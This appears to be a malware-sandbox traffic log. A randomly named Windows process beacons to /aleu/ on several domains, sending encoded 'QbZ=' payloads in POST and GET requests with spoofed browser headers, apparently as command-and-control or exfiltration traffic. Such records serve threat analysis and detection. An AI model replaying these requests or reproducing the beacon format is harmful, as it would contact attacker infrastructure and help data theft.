Timestamp | Bytes transferred | Direction | Data
Apr 17, 2024 08:39:34.352952003 CEST | 748 | OUT | POST /aleu/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
Accept-Encoding: gzip, deflate
Host: www.choosejungmann.com
Origin: http://www.choosejungmann.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 200
Cache-Control: max-age=0
Connection: close
Referer: http://www.choosejungmann.com/aleu/
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                                                                                                                      Data Ascii: QbZ=2ua1uUR2xZdlbu4ZhpyM9ioFaKiZNcPOq40CJ9rlYLj+IMJbcCksG5r7p7839G2ka9c3T9xgWGWIMAcpdRBGqBc1M2UdVS0CnB4JzWcfAlPPW8+qMyOQg6lwck52iFBUo6HNDSYSi41Duz/oeEHf5AjrpG6CEGQrFfg80dGILKMmLtgJjcSVTN6OlcTyBiYiAA==


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.4 | 49741 | 91.195.240.117 | 80 | 2680 | C:\Program Files (x86)\EpxtdbMlDNWVwQORrQnqREWFbXWUOvoLyAdbyLeGkNkao\JlRhrxMCYjuGzWWvXkXNzhLX.exe
Timestamp | Bytes transferred | Direction | Data
Apr 17, 2024 08:39:37.091234922 CEST | 768 | OUT | POST /aleu/ HTTP/1.1
                                                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                                      Host: www.choosejungmann.com
                                                                                                                                      Origin: http://www.choosejungmann.com
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      Content-Length: 220
                                                                                                                                      Cache-Control: max-age=0
                                                                                                                                      Connection: close
                                                                                                                                      Referer: http://www.choosejungmann.com/aleu/
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                                                                                                                      Data Ascii: QbZ=2ua1uUR2xZdlZNgZy+uMxSoCE6iZD8PKq44CJ8uuY5H+IuRbdGQsH5r77b8Ilm2va9BKT/lgWFqIMEUpdmdBlxc3FWUlRS0CnB4JzWIxAlHPWNOqDzORpal3UE52mFBQo6GiDX44i9xDuyPoeVHYyAjp0W7lVlJfdsM19dO5EqQKDLxTytzCBNe94baGMhlrbI/nvntXbUFuXw+pwlBV51Q=
Apr 17, 2024 08:39:37.303014040 CEST | 701 | IN | HTTP/1.1 405 Not Allowed
                                                                                                                                      date: Wed, 17 Apr 2024 06:39:37 GMT
                                                                                                                                      content-type: text/html
                                                                                                                                      content-length: 556
                                                                                                                                      server: NginX
                                                                                                                                      connection: close
                                                                                                                                      Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.4 | 49742 | 91.195.240.117 | 80 | 2680 | C:\Program Files (x86)\EpxtdbMlDNWVwQORrQnqREWFbXWUOvoLyAdbyLeGkNkao\JlRhrxMCYjuGzWWvXkXNzhLX.exe
Timestamp | Bytes transferred | Direction | Data
Apr 17, 2024 08:39:39.826584101 CEST | 10850 | OUT | POST /aleu/ HTTP/1.1
                                                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                                      Host: www.choosejungmann.com
                                                                                                                                      Origin: http://www.choosejungmann.com
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      Content-Length: 10300
                                                                                                                                      Cache-Control: max-age=0
                                                                                                                                      Connection: close
                                                                                                                                      Referer: http://www.choosejungmann.com/aleu/
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
Apr 17, 2024 08:39:40.038364887 CEST | 701 | IN | HTTP/1.1 405 Not Allowed
                                                                                                                                      date: Wed, 17 Apr 2024 06:39:39 GMT
                                                                                                                                      content-type: text/html
                                                                                                                                      content-length: 556
                                                                                                                                      server: NginX
                                                                                                                                      connection: close
                                                                                                                                      Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.4 | 49743 | 91.195.240.117 | 80 | 2680 | C:\Program Files (x86)\EpxtdbMlDNWVwQORrQnqREWFbXWUOvoLyAdbyLeGkNkao\JlRhrxMCYjuGzWWvXkXNzhLX.exe
Timestamp | Bytes transferred | Direction | Data
Apr 17, 2024 08:39:42.561650038 CEST | 473 | OUT | GET /aleu/?QbZ=7syVtg0wm45Xa+0QzpeywUsAZ6yAPvjdu6gzDOasV7nOCe5fUnUhGq++vYwq6UnaX+M1S/9yW1y2BV80NTALyVFlDkUwTwEaqx89+DAXSUPaXuqsOTbI6d4=&PL=0TtPMJQHYL HTTP/1.1
                                                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                      Host: www.choosejungmann.com
                                                                                                                                      Connection: close
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
Apr 17, 2024 08:39:42.772665977 CEST | 107 | IN | HTTP/1.1 436
                                                                                                                                      date: Wed, 17 Apr 2024 06:39:42 GMT
                                                                                                                                      content-length: 0
                                                                                                                                      server: NginX
                                                                                                                                      connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.4 | 49744 | 64.190.62.22 | 80 | 2680 | C:\Program Files (x86)\EpxtdbMlDNWVwQORrQnqREWFbXWUOvoLyAdbyLeGkNkao\JlRhrxMCYjuGzWWvXkXNzhLX.exe
Timestamp | Bytes transferred | Direction | Data
Apr 17, 2024 08:39:48.187171936 CEST | 745 | OUT | POST /aleu/ HTTP/1.1
                                                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                                      Host: www.paydayloans3.shop
                                                                                                                                      Origin: http://www.paydayloans3.shop
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      Content-Length: 200
                                                                                                                                      Cache-Control: max-age=0
                                                                                                                                      Connection: close
                                                                                                                                      Referer: http://www.paydayloans3.shop/aleu/
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                                                                                                                      Data Ascii: QbZ=uVtPTjiO9kY0JrbYLpteLVkciFUdeTCWfnZrqrp24Nt0fTFGNLfUd2nWJVsY7LVmSY3g2AWJ3R9+En96P4HLwB3L2gXp2qHHvpWIkRUYQEQppG+B/QsGp7y0FWwMdKh4E+P+jPS6ECflLCoE5+TAGtYeBu57by8CY5AxadfMTznH1XPdMt36W72w3clk6WE1Ag==
Apr 17, 2024 08:39:48.398648024 CEST | 701 | IN | HTTP/1.1 405 Not Allowed
                                                                                                                                      date: Wed, 17 Apr 2024 06:39:48 GMT
                                                                                                                                      content-type: text/html
                                                                                                                                      content-length: 556
                                                                                                                                      server: NginX
                                                                                                                                      connection: close
                                                                                                                                      Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.4 | 49745 | 64.190.62.22 | 80 | 2680 | C:\Program Files (x86)\EpxtdbMlDNWVwQORrQnqREWFbXWUOvoLyAdbyLeGkNkao\JlRhrxMCYjuGzWWvXkXNzhLX.exe
Timestamp | Bytes transferred | Direction | Data
Apr 17, 2024 08:39:50.920397043 CEST | 765 | OUT | POST /aleu/ HTTP/1.1
                                                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                                      Host: www.paydayloans3.shop
                                                                                                                                      Origin: http://www.paydayloans3.shop
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      Content-Length: 220
                                                                                                                                      Cache-Control: max-age=0
                                                                                                                                      Connection: close
                                                                                                                                      Referer: http://www.paydayloans3.shop/aleu/
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                                                                                                                      Data Ascii: QbZ=uVtPTjiO9kY0b6rYJKVeHlkfvVUdIjCafnlrquZm47d0c3BGMKfUc2nWB1tSkbVtSY6d2CyJ3SB+Ell6OLvMxR3z9AXRyqHHvpWIkRA+QEIppWuB9yIF3ryzAmwMZKh8E+PcjKKcEAnlLHsE5vTDPtYYfe5sdHF3BYpAQd/yehLf5xeHdcWtE7SDqbsQ3V58bmomLgKf3byNVhAuyZVzpEU=
Apr 17, 2024 08:39:51.132538080 CEST | 701 | IN | HTTP/1.1 405 Not Allowed
                                                                                                                                      date: Wed, 17 Apr 2024 06:39:51 GMT
                                                                                                                                      content-type: text/html
                                                                                                                                      content-length: 556
                                                                                                                                      server: NginX
                                                                                                                                      connection: close
                                                                                                                                      Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.4 | 49746 | 64.190.62.22 | 80 | 2680 | C:\Program Files (x86)\EpxtdbMlDNWVwQORrQnqREWFbXWUOvoLyAdbyLeGkNkao\JlRhrxMCYjuGzWWvXkXNzhLX.exe
Timestamp | Bytes transferred | Direction | Data
Apr 17, 2024 08:39:53.656670094 CEST | 10847 | OUT | POST /aleu/ HTTP/1.1
                                                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                                      Host: www.paydayloans3.shop
                                                                                                                                      Origin: http://www.paydayloans3.shop
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      Content-Length: 10300
                                                                                                                                      Cache-Control: max-age=0
                                                                                                                                      Connection: close
                                                                                                                                      Referer: http://www.paydayloans3.shop/aleu/
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
Apr 17, 2024 08:39:53.868591070 CEST | 701 | IN | HTTP/1.1 405 Not Allowed
                                                                                                                                      date: Wed, 17 Apr 2024 06:39:53 GMT
                                                                                                                                      content-type: text/html
                                                                                                                                      content-length: 556
                                                                                                                                      server: NginX
                                                                                                                                      connection: close
                                                                                                                                      Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
8 | 192.168.2.4 | 49747 | 64.190.62.22 | 80 | 2680 | C:\Program Files (x86)\EpxtdbMlDNWVwQORrQnqREWFbXWUOvoLyAdbyLeGkNkao\JlRhrxMCYjuGzWWvXkXNzhLX.exe
Timestamp | Bytes transferred | Direction | Data
Apr 17, 2024 08:39:56.404712915 CEST | 472 | OUT | GET /aleu/?QbZ=jXFvQTK4oWsNW5HZJ/0gKTQct2QKO2STTlZ8jbhw/9BHTw5yM7uncTfMOk5Q960TVKfivgiXqRpaWw5bUpeZkV7I+j781KbGhsSlxE46GWITw0n47D4H34I=&PL=0TtPMJQHYL HTTP/1.1
                                                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                      Host: www.paydayloans3.shop
                                                                                                                                      Connection: close
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
Apr 17, 2024 08:39:56.615792036 CEST | 107 | IN | HTTP/1.1 436
                                                                                                                                      date: Wed, 17 Apr 2024 06:39:56 GMT
                                                                                                                                      content-length: 0
                                                                                                                                      server: NginX
                                                                                                                                      connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
9 | 192.168.2.4 | 49748 | 217.76.128.34 | 80 | 2680 | C:\Program Files (x86)\EpxtdbMlDNWVwQORrQnqREWFbXWUOvoLyAdbyLeGkNkao\JlRhrxMCYjuGzWWvXkXNzhLX.exe
Timestamp | Bytes transferred | Direction | Data
Apr 17, 2024 08:40:02.441390991 CEST | 757 | OUT | POST /aleu/ HTTP/1.1
                                                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                                      Host: www.colchondealquiler.com
                                                                                                                                      Origin: http://www.colchondealquiler.com
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      Content-Length: 200
                                                                                                                                      Cache-Control: max-age=0
                                                                                                                                      Connection: close
                                                                                                                                      Referer: http://www.colchondealquiler.com/aleu/
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                                                                                                                      Data Ascii: QbZ=scK0XNFy15BLCH4qAqnNCkX3U5lyCG5l2EOvh7bjVSSAPGhwXvaQfRVEfFPTGxDfLzz3TjVlvM4GmRiAL1Uk9pnjT3fx8eegG3wU2ldUo8zES2XUG6p6X0BzEbs9gg4LAVR9cBwLhRoq7FIfDv55981cIcHW5xV36LIMYQZ5tW9RyxciMTFQszPH3CXhvwiHdg==
Apr 17, 2024 08:40:02.673566103 CEST | 1289 | IN | HTTP/1.1 404 Not Found
                                                                                                                                      Date: Wed, 17 Apr 2024 06:40:02 GMT
                                                                                                                                      Server: Apache
                                                                                                                                      X-ServerIndex: llim605
                                                                                                                                      Upgrade: h2,h2c
                                                                                                                                      Connection: Upgrade, close
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                      Data Ascii: 1ebe<!DOCTYPE HTML><html lang="es"><head> <meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1" /> <title>www.colchondealquiler.com</title> <meta name="description" content="$REGISTRANT1 $REGISTRANT2 $REGISTRANT3" /> <link rel="stylesheet" href="https://arsys.es/css/parking2.css"> <meta id="theWidth" name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"> <script> window.onload = function () { if(screen.width <= 420) { var mvp = document.getElementById('theWidth'); mvp.setAttribute('content','width=400'); } } </script></head><body><header> <div class="center" style="color:#;border-color:#;"> <div class="title"> <i class="icon-seguimiento"></i> <p>Esta es la p&aacute;gina de:</p> <h1>www.colchondealquiler.com</h1> </div> ...COMIENZA_TEXTO_REGISTRANTE-->...TERMINA_TEXTO_REGISTRANTE--> ...COMIENZA_COMENTARIO-->...
Apr 17, 2024 08:40:02.673609018 CEST | 1289 | IN
                                                                                                                                      Data Ascii: TERMINA_COMENTARIO--> ...COMIENZA_PIE_PERSONAL-->...TERMINA_PIE_PERSONAL--> </div> <div class="back" style="background-color:#;"></div></header><section class="search"> <div class="center"> <span>busca tu
Apr 17, 2024 08:40:02.673650026 CEST | 1289 | IN
                                                                                                                                      Data Ascii: profesional</a> con tu nombre de dominio desde cualquier dispositivo.</p> </article> <article> <h2>Certificado SSL</h2> <p>Evita que tu web se muestre como "no segura" con el <a href="https://www.a
Apr 17, 2024 08:40:02.673691988 CEST | 1289 | IN
                                                                                                                                      Data Ascii: Online">Tienda Online</a>.</p> </article> ...<article> <h2>Posicionamiento SEO</h2> <p>Optimiza la <a href="https://www.arsys.es/herramientas/seo?utm_source=parking&amp;utm_medium=link&amp;utm_camp
Apr 17, 2024 08:40:02.673727989 CEST | 1289 | IN
                                                                                                                                      Data Ascii: tm_campaign=vps" title="Servidor VPS">servidor VPS</a>: potencia y rendimiento con transferencia ilimitada.</p> </article> <article> <h2>Servidor Dedicado</h2> <p>Administra tu propio <a href="https:
Apr 17, 2024 08:40:02.673764944 CEST | 1289 | IN
                                                                                                                                      Data Ascii: > <h2>Soluciones a Medida</h2> <p>Pensando en cada cliente para ofrecerle una <a href="https://www.arsys.es/soluciones?utm_source=parking&amp;utm_medium=link&amp;utm_campaign=solutions" title="Solucin empresarial a
Apr 17, 2024 08:40:02.673800945 CEST | 360 | IN
                                                                                                                                      Data Ascii: ctor('label[for=dom]').innerHTML + domainSearchText[domainSearchChar]; domainSearchChar++; } else { domainSearchChar = 0; document.querySelector('label[for=dom]').innerHTML = '';
Apr 17, 2024 08:40:02.673835039 CEST | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
10 | 192.168.2.4 | 49749 | 217.76.128.34 | 80 | 2680 | C:\Program Files (x86)\EpxtdbMlDNWVwQORrQnqREWFbXWUOvoLyAdbyLeGkNkao\JlRhrxMCYjuGzWWvXkXNzhLX.exe
Timestamp | Bytes transferred | Direction | Data
Apr 17, 2024 08:40:05.731841087 CEST | 777 | OUT | POST /aleu/ HTTP/1.1
                                                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                                      Host: www.colchondealquiler.com
                                                                                                                                      Origin: http://www.colchondealquiler.com
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      Content-Length: 220
                                                                                                                                      Cache-Control: max-age=0
                                                                                                                                      Connection: close
                                                                                                                                      Referer: http://www.colchondealquiler.com/aleu/
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                                                                                                                      Data Ascii: QbZ=scK0XNFy15BLCnIqTd7NW0X0IplyMm5h2ECvh53KVAmAPjdwF+aQeRVEY1PWbhDWLz+ITiplvMsGmUmAKCAnyZnlaXfzy+egG3wU2hxyo87ERF/UEfV9aUByN7s9kg4HAVRfcDEthTQq7HAfA7l2081eMcG93x8z8elRZgwXtnZz+XN4dikH+zr0qFeVizfOGlYwWuV6JaH2Mqw22oigEHo=
Apr 17, 2024 08:40:05.962671995 CEST | 1289 | IN | HTTP/1.1 404 Not Found
                                                                                                                                      Date: Wed, 17 Apr 2024 06:40:05 GMT
                                                                                                                                      Server: Apache
                                                                                                                                      X-ServerIndex: llim604
                                                                                                                                      Upgrade: h2,h2c
                                                                                                                                      Connection: Upgrade, close
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                      Data Ascii: 1ebe<!DOCTYPE HTML><html lang="es"><head> <meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1" /> <title>www.colchondealquiler.com</title> <meta name="description" content="$REGISTRANT1 $REGISTRANT2 $REGISTRANT3" /> <link rel="stylesheet" href="https://arsys.es/css/parking2.css"> <meta id="theWidth" name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"> <script> window.onload = function () { if(screen.width <= 420) { var mvp = document.getElementById('theWidth'); mvp.setAttribute('content','width=400'); } } </script></head><body><header> <div class="center" style="color:#;border-color:#;"> <div class="title"> <i class="icon-seguimiento"></i> <p>Esta es la p&aacute;gina de:</p> <h1>www.colchondealquiler.com</h1> </div> ...COMIENZA_TEXTO_REGISTRANTE-->...TERMINA_TEXTO_REGISTRANTE--> ...COMIENZA_COMENTARIO-->...
Apr 17, 2024 08:40:05.962727070 CEST | 1289 | IN
                                                                                                                                      Data Ascii: TERMINA_COMENTARIO--> ...COMIENZA_PIE_PERSONAL-->...TERMINA_PIE_PERSONAL--> </div> <div class="back" style="background-color:#;"></div></header><section class="search"> <div class="center"> <span>busca tu
Apr 17, 2024 08:40:05.962745905 CEST | 1289 | IN
                                                                                                                                      Data Ascii: profesional</a> con tu nombre de dominio desde cualquier dispositivo.</p> </article> <article> <h2>Certificado SSL</h2> <p>Evita que tu web se muestre como "no segura" con el <a href="https://www.a
Apr 17, 2024 08:40:05.962779999 CEST | 1289 | IN
                                                                                                                                      Data Ascii: Online">Tienda Online</a>.</p> </article> ...<article> <h2>Posicionamiento SEO</h2> <p>Optimiza la <a href="https://www.arsys.es/herramientas/seo?utm_source=parking&amp;utm_medium=link&amp;utm_camp
Apr 17, 2024 08:40:05.962798119 CEST | 1289 | IN
                                                                                                                                      Data Ascii: tm_campaign=vps" title="Servidor VPS">servidor VPS</a>: potencia y rendimiento con transferencia ilimitada.</p> </article> <article> <h2>Servidor Dedicado</h2> <p>Administra tu propio <a href="https:
Apr 17, 2024 08:40:05.962820053 CEST | 1289 | IN
                                                                                                                                      Data Ascii: > <h2>Soluciones a Medida</h2> <p>Pensando en cada cliente para ofrecerle una <a href="https://www.arsys.es/soluciones?utm_source=parking&amp;utm_medium=link&amp;utm_campaign=solutions" title="Solucin empresarial a
Apr 17, 2024 08:40:05.962836027 CEST | 360 | IN
                                                                                                                                      Data Ascii: ctor('label[for=dom]').innerHTML + domainSearchText[domainSearchChar]; domainSearchChar++; } else { domainSearchChar = 0; document.querySelector('label[for=dom]').innerHTML = '';
Apr 17, 2024 08:40:05.962953091 CEST | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
11 | 192.168.2.4 | 49750 | 217.76.128.34 | 80 | 2680 | C:\Program Files (x86)\EpxtdbMlDNWVwQORrQnqREWFbXWUOvoLyAdbyLeGkNkao\JlRhrxMCYjuGzWWvXkXNzhLX.exe
Timestamp | Bytes transferred | Direction | Data
Apr 17, 2024 08:40:08.485328913 CEST | 10859 | OUT | POST /aleu/ HTTP/1.1
                                                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                                      Host: www.colchondealquiler.com
                                                                                                                                      Origin: http://www.colchondealquiler.com
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      Content-Length: 10300
                                                                                                                                      Cache-Control: max-age=0
                                                                                                                                      Connection: close
                                                                                                                                      Referer: http://www.colchondealquiler.com/aleu/
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
Data Ascii: QbZ=[encoded form value omitted]
Apr 17, 2024 08:40:08.719783068 CEST | 1289 | IN | HTTP/1.1 404 Not Found
                                                                                                                                      Date: Wed, 17 Apr 2024 06:40:08 GMT
                                                                                                                                      Server: Apache
                                                                                                                                      X-ServerIndex: llim604
                                                                                                                                      Upgrade: h2,h2c
                                                                                                                                      Connection: Upgrade, close
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                      Data Ascii: 1ebe<!DOCTYPE HTML><html lang="es"><head> <meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1" /> <title>www.colchondealquiler.com</title> <meta name="description" content="$REGISTRANT1 $REGISTRANT2 $REGISTRANT3" /> <link rel="stylesheet" href="https://arsys.es/css/parking2.css"> <meta id="theWidth" name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"> <script> window.onload = function () { if(screen.width <= 420) { var mvp = document.getElementById('theWidth'); mvp.setAttribute('content','width=400'); } } </script></head><body><header> <div class="center" style="color:#;border-color:#;"> <div class="title"> <i class="icon-seguimiento"></i> <p>Esta es la p&aacute;gina de:</p> <h1>www.colchondealquiler.com</h1> </div> ...COMIENZA_TEXTO_REGISTRANTE-->...TERMINA_TEXTO_REGISTRANTE--> ...COMIENZA_COMENTARIO-->...
Apr 17, 2024 08:40:08.719821930 CEST | 1289 | IN
                                                                                                                                      Data Ascii: TERMINA_COMENTARIO--> ...COMIENZA_PIE_PERSONAL-->...TERMINA_PIE_PERSONAL--> </div> <div class="back" style="background-color:#;"></div></header><section class="search"> <div class="center"> <span>busca tu
Apr 17, 2024 08:40:08.719861031 CEST | 1289 | IN
                                                                                                                                      Data Ascii: profesional</a> con tu nombre de dominio desde cualquier dispositivo.</p> </article> <article> <h2>Certificado SSL</h2> <p>Evita que tu web se muestre como "no segura" con el <a href="https://www.a
Apr 17, 2024 08:40:08.719897032 CEST | 1289 | IN
                                                                                                                                      Data Ascii: Online">Tienda Online</a>.</p> </article> ...<article> <h2>Posicionamiento SEO</h2> <p>Optimiza la <a href="https://www.arsys.es/herramientas/seo?utm_source=parking&amp;utm_medium=link&amp;utm_camp
Apr 17, 2024 08:40:08.719935894 CEST | 1289 | IN
                                                                                                                                      Data Ascii: tm_campaign=vps" title="Servidor VPS">servidor VPS</a>: potencia y rendimiento con transferencia ilimitada.</p> </article> <article> <h2>Servidor Dedicado</h2> <p>Administra tu propio <a href="https:
Apr 17, 2024 08:40:08.719974041 CEST | 1289 | IN
                                                                                                                                      Data Ascii: > <h2>Soluciones a Medida</h2> <p>Pensando en cada cliente para ofrecerle una <a href="https://www.arsys.es/soluciones?utm_source=parking&amp;utm_medium=link&amp;utm_campaign=solutions" title="Solucin empresarial a
Apr 17, 2024 08:40:08.720010042 CEST | 360 | IN
                                                                                                                                      Data Ascii: ctor('label[for=dom]').innerHTML + domainSearchText[domainSearchChar]; domainSearchChar++; } else { domainSearchChar = 0; document.querySelector('label[for=dom]').innerHTML = '';
Apr 17, 2024 08:40:08.720046043 CEST | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
12 | 192.168.2.4 | 49751 | 217.76.128.34 | 80 | 2680 | C:\Program Files (x86)\EpxtdbMlDNWVwQORrQnqREWFbXWUOvoLyAdbyLeGkNkao\JlRhrxMCYjuGzWWvXkXNzhLX.exe
Timestamp | Bytes transferred | Direction | Data
Apr 17, 2024 08:40:11.246309996 CEST | 476 | OUT | GET /aleu/?QbZ=heiUU9lLv45IJG5VBKLzBQ/QU5pXOEZ122KPvL/NNDCzNkInOevyA08bejzsewnbLAKBPzZGyeY+skKwUgloq+HQclTA5c3JDTwCxVF3w8TOe3DJCoRyHmQ=&PL=0TtPMJQHYL HTTP/1.1
                                                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                      Host: www.colchondealquiler.com
                                                                                                                                      Connection: close
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
Apr 17, 2024 08:40:11.477191925 CEST | 1289 | IN | HTTP/1.1 404 Not Found
                                                                                                                                      Date: Wed, 17 Apr 2024 06:40:11 GMT
                                                                                                                                      Server: Apache
                                                                                                                                      X-ServerIndex: llim603
